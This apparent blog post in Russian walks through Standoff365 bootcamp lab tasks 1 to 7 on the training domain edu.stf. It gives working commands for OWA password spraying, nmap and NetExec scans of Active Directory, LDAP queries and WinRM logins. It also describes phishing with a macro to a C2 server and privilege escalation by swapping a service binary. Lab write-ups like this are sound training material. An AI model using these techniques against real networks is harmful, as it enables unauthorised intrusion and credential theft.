{"id":482295,"date":"2026-06-03T19:18:36","date_gmt":"2026-06-03T19:18:36","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=482295"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=482295","title":{"rendered":"\u041a\u0430\u043a \u044f \u0438\u043d\u0444\u0440\u0443 \u0432 \u0431\u0443\u0442\u043a\u0435\u043c\u043f\u0435 \u043d\u0430 Standoff365 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b [Infra 1] \u2014 [Infra 12]"},"content":{"rendered":"
\n
<\/figure>\n

\u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0445\u043e\u0442\u0435\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043a\u0430\u0436\u0434\u044b\u0439 \u043f\u043e\u0441\u0442 \u0434\u043b\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0432 \u0438\u043d\u0444\u0440\u0435, \u043d\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0435, \u0447\u0442\u043e \u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043c \u0434\u0430\u0436\u0435 \u043e\u0441\u043e\u0431\u043e \u043d\u0435\u0447\u0435\u0433\u043e, \u0442\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438 \u0432 \u0431\u0443\u0442\u043a\u0435\u043c\u043f\u0435 \u043e\u0447\u0435\u043d\u044c \u0441\u0438\u043b\u044c\u043d\u043e \u043e\u0431\u043b\u0435\u0433\u0447\u0430\u044e\u0442 \u0440\u0435\u0448\u0435\u043d\u0438\u0435. <\/p>\n

\u041d\u0430\u0447\u043d\u0435\u043c \u0441 \u043f\u0435\u0440\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u044b.<\/p>\n

[infra-1] \u0412\u043d\u0435\u0448\u043d\u044f\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430<\/h3>\n

\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0432 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430\u0445 \u043d\u0430\u043c \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0441\u0430\u0439\u0442 \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0443\u0436\u043d\u043e \u0438\u0441\u043a\u0430\u0442\u044c e-mail, \u0442\u043e \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u0441\u0430\u0439\u0442 www.edu.stf \u0438 \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0432 \u0444\u0443\u0442\u0435\u0440\u0435, \u043f\u043e\u0437\u0436\u0435 \u043e\u043d\u0438 \u043d\u0430\u043c \u0432\u0441\u0435 \u043f\u0440\u0438\u0433\u043e\u0434\u044f\u0442\u0441\u044f.<\/p>\n

\u0412\u0432\u043e\u0434\u0438\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0435 50 \u043e\u0447\u043a\u043e\u0432.<\/p>\n

[infra-2] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u043f\u043e\u0447\u0442\u0435<\/h3>\n

\u0417\u0434\u0435\u0441\u044c \u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0430\u0440\u0438\u043b\u0441\u044f, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0434\u0443\u043c\u0430\u043b, \u0447\u0442\u043e \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0442\u043e\u043c \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u0447\u0442\u043e \u0438 \u0441\u0430\u0439\u0442. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u0443\u0436\u0435 \u043f\u0440\u043e\u0448\u0435\u043b web \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0431\u0443\u0442\u043a\u0435\u043c\u043f\u0430, \u0443 \u043c\u0435\u043d\u044f \u0443\u0436\u0435 \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u044d\u0442\u043e\u043c\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0443. \u042f \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b.<\/p>\n

\u041f\u043e\u0448\u0435\u043b \u0447\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0440\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u043a\u0438 \u0438 \u0432\u0441\u043f\u043e\u043c\u043d\u0438\u043b \u043f\u0440\u043e \u0443\u0442\u0438\u043b\u0438\u0442\u0443 dig. MX — \u0437\u0430\u043f\u0438\u0441\u044c \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0432 DNS.<\/p>\n

dig MX edu.stf @10.124.1.240; <<>> DiG 9.20.22-1-Debian <<>> MX edu.stf @10.124.1.240;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4969;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232; COOKIE: fcf10a9b3ec7da8e010000006a1015d40051135593be6226 (good);; QUESTION SECTION:;edu.stf.                       IN      MX;; ANSWER SECTION:edu.stf.                604800  IN      MX      10 mail.edu.stf.;; ADDITIONAL SECTION:mail.edu.stf.           604800  IN      A       10.124.1.203;; Query time: 207 msec;; SERVER: 10.124.1.240#53(10.124.1.240) (UDP);; WHEN: Fri May 22 04:37:44 EDT 2026;; MSG SIZE  rcvd: 101<\/code>
<\/a><\/div><\/pre>\n
\u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 etc\/hosts.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Burp, \u043a\u0430\u043a \u043f\u0438\u0448\u0443\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0432\u0442\u043e\u0440\u044b \u0440\u0430\u0439\u0442\u0430\u043f\u043e\u0432, \u043d\u043e \u0434\u043b\u044f 3 email\u2019\u043e\u0432 \u0438 10 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u044d\u0442\u043e \u043a\u0430\u043a \u0433\u043d\u0430\u0442\u044c \u201c\u041a\u0410\u041c\u0410\u0417\u201d, \u0447\u0442\u043e\u0431\u044b \u0434\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u0441\u043e\u0441\u0435\u0434\u043d\u0435\u0433\u043e \u0434\u043e\u043c\u0430. \u041d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0435 e-mail \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 spray.txt \u043f\u0440\u043e\u0433\u043e\u043d\u044f\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0441\u043e\u043b\u044c\u043d\u0443\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u0443.<\/p>\n
atomizer owa mail.edu.stf spray.txt users_standoff.txt -i 0:00:01[*] Trying to find autodiscover URL[+] Using OWA autodiscover URL: https:\/\/exchange.edu.stf\/autodiscover\/autodiscover.xml[+] OWA domain appears to be hosted internally[+] Got internal domain name using OWA: edu[*] Starting spray at 2026-05-21 20:53:27 UTC[-] Authentication failed: t_mathis@edu.stf:password (Invalid credentials)[-] Authentication failed: r_andrews@edu.stf:password (Invalid credentials)[-] Authentication failed: s_dotson@edu.stf:password (Invalid credentials)[*] Starting spray at 2026-05-21 20:58:27 UTC[-] Authentication failed: r_andrews@edu.stf:anna (Invalid credentials)[-] Authentication failed: t_mathis@edu.stf:anna (Invalid credentials)[-] Authentication failed: s_dotson@edu.stf:anna (Invalid credentials)[*] Starting spray at 2026-05-21 21:03:28 UTC[-] Authentication failed: t_mathis@edu.stf:dancer (Invalid credentials)[-] Authentication failed: s_dotson@edu.stf:dancer (Invalid credentials)...[+] Dumped 2 valid accounts to owa_valid_accounts.txt<\/code>
<\/a><\/div><\/pre>\n
\u041d\u0430\u0445\u043e\u0434\u0438\u043c 2 \u0432\u0430\u043b\u0434\u0438\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c.<\/p>\n
\u041c\u043e\u0436\u043d\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c e-mail \u0441 \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u043d\u0438\u0445 \u0438 \u043e\u0442\u0432\u0435\u0442\u043d\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u043e\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0444\u043b\u0430\u0433.<\/p>\n
[infra-3] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a VPN \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438<\/h3>\n
\u042d\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u0432\u044f\u0437\u0430\u043d\u043e \u0441 \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c web. \u042f \u0440\u0430\u043d\u0435\u0435 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043b \u044d\u0442\u043e\u0442 config \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0430 \u0441\u043a\u0440\u044b\u0442\u044b\u0445 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439.<\/p>\n
\u041a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435, \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u0432 .ovpn \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0441 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438.<\/p>\n
[infra-4] \u0412\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u044f\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (Active Directory)<\/h3>\n
\u0414\u0430\u043b\u0435\u0435 \u0438\u0437 \u0444\u0430\u0439\u043b\u0430 config \u0443\u0437\u043d\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435<\/p>\n
route 10.154.16.0 255.255.254.0ifconfig 10.154.17.5 255.255.255.224dhcp-option DNS 10.154.16.134<\/code>
<\/a><\/div><\/pre>\n
IP-\u0430\u0434\u0440\u0435\u0441 \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438: 10.154.17.5 \u0441 \u043c\u0430\u0441\u043a\u043e\u0439 \/27 (255.255.255.224). \u0422\u043e \u0435\u0441\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0430\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u043e\u0434\u0441\u0435\u0442\u044c \u2014 \u044d\u0442\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d \u043e\u0442 10.154.17.0 \u0434\u043e 10.154.17.31.<\/p>\n
\u041f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 10.124.1.203, \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a DMZ \u0438\u043b\u0438 \u0441\u043e\u0441\u0435\u0434\u043d\u0435\u0439 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u043e\u0434\u0441\u0435\u0442\u0438 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0430, \u043d\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b AD \u0431\u0443\u0434\u0443\u0442 \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0435 10.154.16.0\/23.<\/p>\n
\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u043d\u044f\u0442\u044c, \u043a\u0430\u043a\u0438\u0435 IP-\u0430\u0434\u0440\u0435\u0441\u0430 \u0432\u043e\u043e\u0431\u0449\u0435 \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0442 \u043d\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u044b. \u041f\u0440\u043e\u0439\u0434\u0435\u043c\u0441\u044f \u043f\u043e \u0432\u0441\u0435\u0439 \u0441\u0435\u0442\u0438 10.154.16.0\/23 \u0431\u0435\u0437 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0440\u0442\u043e\u0432 (-sn):<\/p>\n
nmap -sn -v 10.154.16.0\/23 -oG live_hosts.txt<\/code>
<\/a><\/div><\/pre>\n
grep \"Up\" live_hosts.txt | awk '{print $2}' > targets.txt<\/code>
<\/a><\/div><\/pre>\n
\u041c\u043e\u0436\u043d\u043e \u043f\u043e\u0439\u0442\u0438 \u0435\u0449\u0435 \u0434\u0430\u043b\u044c\u0448\u0435 \u0438 \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u0438\u043a \u0434\u043b\u044f etc\/hosts \u0441 \u0443\u0436\u0435 \u0436\u0438\u0432\u044b\u043c\u0438 \u0430\u0439\u043f\u0438\u0448\u043d\u0438\u043a\u0430\u043c\u0438 \u0438 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u043c\u0438 \u0438\u043c\u0435\u043d\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 nmap \u0432\u044b\u0434\u0430\u043b \u0432 \u0432\u044b\u0432\u043e\u0434\u0435.<\/p>\n
awk '\/Status: Up\/ && $3 !~ \/^\\(\\)$\/ { ip = $2; host = $3; gsub(\/[()]\/, \"\", host); print ip, host }' infra-hosts1.txt > awk-host.txt<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u0438\u0441\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0440\u0442\u043e\u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (\u0414\u043b\u044f Active Directory)<\/p>\n
nmap -sS -Pn -p 88,135,139,389,445,3268,3389,80,443 -iL targets.txt -oN ad_services.txt<\/code>
<\/a><\/div><\/pre>\n
\u0422\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0432\u0441\u0435\u0439 \u0441\u0435\u0442\u0438 \u043d\u0430 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b SMB (Windows-\u043c\u0430\u0448\u0438\u043d\u044b). \u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0441\u0430\u043c\u0430 \u043f\u043e\u043a\u0430\u0436\u0435\u0442 \u0438\u043c\u0435\u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u0432\u0435\u0440\u0441\u0438\u0438 Windows (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Windows Server 2019) \u0438 \u0432\u0445\u043e\u0434\u0438\u0442 \u043b\u0438 \u0445\u043e\u0441\u0442 \u0432 \u0434\u043e\u043c\u0435\u043d:<\/p>\n
nxc smb 10.154.16.0\/23<\/code>
<\/a><\/div><\/pre>\n
\"\u041d\u0430\u0445\u043e\u0434\u0438\u043c<\/p>\n
\u041d\u0430\u0445\u043e\u0434\u0438\u043c \u043a\u043e\u043c\u043f \u0420\u043e\u0434\u0440\u0438\u0433\u0435\u0437\u0430<\/figcaption><\/div>\n<\/figure>\n
<\/figure>\n
 \u041d\u0430\u0445\u043e\u0434\u0438\u043c \u043a\u043e\u043c\u043f \u0440\u043e\u0434\u0440\u0438\u0433\u0435\u0437\u0430 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0435\u0433\u043e \u0442\u0435\u043b\u0435\u0444\u043e\u043d \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ldap <\/p>\n
ldapsearch -x -H ldap:\/\/10.154.16.134 -D \"r_andrews@edu.stf\" -w \"***\" -b \"DC=edu,DC=stf\" \"(sAMAccountName=*rodriquez*)\" | grep \"phone\"<\/code>
<\/a><\/div><\/pre>\n
[infra-5] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430<\/h3>\n
\u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432, \u043d\u0443\u0436\u043d\u044b\u0439 \u043d\u0430\u043c winrm.<\/p>\n
nxc winrm 10.154.16.0\/23 -u 's_dotson' -p '***'<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f, \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433.<\/p>\n
[infra-6] \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430<\/h3>\n
\u0421 \u044d\u0442\u0438\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c \u0443 \u043c\u0435\u043d\u044f \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b. \u042f \u0438\u0437\u0443\u0447\u0438\u043b \u0438\u043d\u0444\u0443 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0435 \u0438 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b \u043c\u043e\u0439 \u043c\u0430\u043a\u0440\u043e\u0441 \u0443 \u0441\u0435\u0431\u044f \u043d\u0430 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. Doc \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u043e\u0442\u043b\u0438\u0447\u043d\u043e \u043e\u0442\u0440\u043a\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u044e \u0441\u0435\u0441\u0441\u0438\u044e \u0432 Adaptix C2. \u0417\u0434\u0435\u0441\u044c \u0436\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b \u0432 \u0440\u0430\u0437\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0441 2 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432, \u043d\u043e \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e \u0438\u0434\u0443\u0442 \u0432 \u043f\u0443\u0441\u0442\u043e\u0442\u0443, \u043d\u0438 \u043e\u0442\u0432\u0435\u0442\u0430, \u043d\u0438 \u043f\u0440\u0438\u0432\u0435\u0442\u0430.<\/p>\n
<\/figure>\n
\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0440\u0435\u0448\u0438\u0442\u044c \u0442\u0430\u0441\u043a \u043f\u043e \u0437\u0430\u0434\u0443\u043c\u043a\u0435 \u0430\u0432\u0442\u043e\u0440\u0430 \u0438 \u044f \u0440\u0435\u0448\u0438\u043b \u0442\u0430\u0441\u043a \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443.<\/p>\n
\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043f\u043a \u044f \u043d\u0430\u0448\u0435\u043b \u043a\u0440\u0435\u0434\u044b, \u043f\u0440\u0438\u0447\u0435\u043c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0434\u0432\u0443\u0445 ws \u0430\u0434\u043c\u0438\u043d\u043e\u0432. \u041f\u0440\u043e\u0441\u0442\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043a\u0440\u0435\u0434\u043e\u0432 \u0434\u0430\u043b\u0430 \u0437\u0430\u0432\u0435\u0442\u043d\u0443\u044e \u043d\u0430\u0434\u043f\u0438\u0441\u044c (Pwn3d!) \u043a \u043d\u0443\u0436\u043d\u043e\u043c\u0443 \u043f\u043a. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0442\u0430\u043a\u0436\u0435 \u043f\u043e winrm \u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433. \u0410 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0430, \u0443\u0436\u0435 \u043d\u0435 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0433\u043e \u0442\u0440\u0443\u0434\u0430.<\/p>\n
[infra-7] \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430<\/h3>\n
\u041e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u043f\u043a \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043a\u0440\u0435\u0434\u044b \u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e winrm. Winpeas \u0438 Sharpup \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043c\u043e\u0447\u044c https:\/\/github.com\/ghostpack\/sharpup<\/a><\/p>\n
\u0414\u043b\u044f sharpup \u043d\u0443\u0436\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438. \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u0443\u0435\u043c \u043d\u0430 Kali.<\/p>\n
xbuild SharpUp.csproj \/p:Configuration=Release \/p:Platform=\"AnyCPU\"<\/code>
<\/a><\/div><\/pre>\n
\u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u0443\u0435\u043c \u0442\u0430\u043a, \u043d\u0430 \u0432\u0438\u043d\u0434\u043e\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0432\u044b\u043b\u0435\u0437\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0430 \u0432\u0435\u0440\u0441\u0438\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432 \u0444\u0430\u0439\u043b\u0435 SharpUp.csproj \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432 \u0441\u0442\u0440\u043e\u043a\u0435 \u043d\u0430 4.5<\/p>\n
<TargetFrameworkVersion>v3.5<\/TargetFrameworkVersion><\/code>
<\/a><\/div><\/pre>\n
\u0422\u043e\u0433\u0434\u0430 \u0432 \u043f\u0430\u043f\u043a\u0435 bin \u0431\u0443\u0434\u0435\u0442 \u0443\u0436\u0435 \u0433\u043e\u0442\u043e\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f.<\/p>\n
\u041f\u0435\u0440\u0435\u0434\u0430\u0435\u043c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c<\/p>\n
C:\\Users\\S_Dotson\\Documents\\SharpUp.exe audit<\/code>
<\/a><\/div><\/pre>\n
\"powerup_win_privs\"<\/p>\n
powerup_win_privs<\/figcaption><\/div>\n<\/figure>\n
\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430\u0434 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u043e\u043c, \u0442\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u043e\u0439 \u043f\u043e\u0434\u043c\u0435\u043d\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0430\u0433\u0435\u043d\u0442\u0430 \u0438 \u043f\u043e\u043b\u043e\u0436\u0438\u043c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e \u0441\u0435\u0440\u0441\u0438\u0441\u0430.<\/p>\n
<\/figure>\n
